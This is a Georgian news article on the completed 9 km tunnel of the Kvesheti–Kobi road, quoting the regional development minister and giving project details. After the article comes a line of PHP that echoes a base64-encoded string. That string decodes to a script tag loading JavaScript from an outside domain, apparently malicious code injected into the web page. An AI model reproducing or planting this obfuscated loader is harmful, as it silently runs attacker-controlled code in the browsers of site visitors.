celsiusi
ავერსი შნაიდერი

 ყველას გილოცავთ ამ მნიშვნელოვან დღეს - დაუღალავი შრომისა და დიდი ძალისხმევის შედეგს. უკვე შეგვიძლია ვთქვათ, რომ ეს გზა არცერთი დღით აღარ ჩაიკეტება და ყოველთვის იქნება უზრუნველყოფილი ფიზიკური კავშირი ჩვენს მუნიციპალიტეტებს შორის. ახალი გზით ხადის ხეობის 10-მდე სოფლის მოსახლეობა ზამთარში შეინარჩუნებს კავშირს გარესამყაროსთან და მაცხოვრებლებს ექნებათ წვდომა ყველა საჭირო და აუცილებელ მომსახურებაზე, -ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა ირაკლი ქარსელაძემ ქვეშეთი-კობის გზის მშენებლობის პროექტის ფარგლებში, სოფელ ქვეშეთის სოფელ კობთან დამაკავშირებელი 9 კმ-იანი გვირაბის გაჭრის დასრულების შემდეგ განაცხადა.

მან აღნიშნა, რომ პროექტი, ასევე უმნიშვნელოვანესია საინჟინრო თვალსაზრისით, სპეციალურად ამ პროექტისთვის დამზადებული გვირაბის საბურღი დანადგარით- TBM-ით, კლდოვან ქანებში გამოიჭრა ჩვენს ქვეყანაში ყველაზე გრძელი, 9 კილომეტრიანი და 15 მეტრის დიამეტრის სატრანსპორტო გვირაბი. ამასთან, გრძელდება 9 კმ-იანი გვირაბის პარალელური საევაკუაციო გვირაბის მშენებლობა, რომელიც ამ ეტაპზე, 7 730 მ-ზეა გაჭრილი.

მინისტრმა მადლობა გადაუხადა პროექტზე მომუშავე განვითარების პარტნიორებს, აზიის განვითარების ბანკის, ასევე ევროპის რეკონსტრუქციისა და განვითარების ბანკის, საავტომობილო გზების დეპარტამენტის, კონტრაქტორი და საზედამხედველო კომპანიების წარმომადგენლებს.

“ქვეშეთი-კობის პროექტის ფარგლებში, ჯამში, შენდება განათების სისტემით უზრუნველყოფილი 23 კმ-იანი 2 ზოლიანი ასფალტ-ბეტონის გზა, რომელიც მოიცავს 5 ხიდისა და 5 გვირაბის მშენებლობას და 1 ხიდის რეაბილიტაციას. ამასთან, პროექტი ითვალისწინებს გუდაურამდე მისასვლელი 5 კმ-იანი ახალი გზის და ტურისტული ცენტრის მშენებლობას. საგზაო უსაფრთხოების ყველა საჭირო სტანდარტით უზრუნველყოფილი ახალი გზა შეამცირებს გადაადგილების დროსაც.

ქვეშეთი-კობის 23 კმ-იანი გზის მშენებლობა, ეტაპობრივად, 2024-2025 წლებში დასრულდება“, - ნათქვამია ინფორმაციაში.

173
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");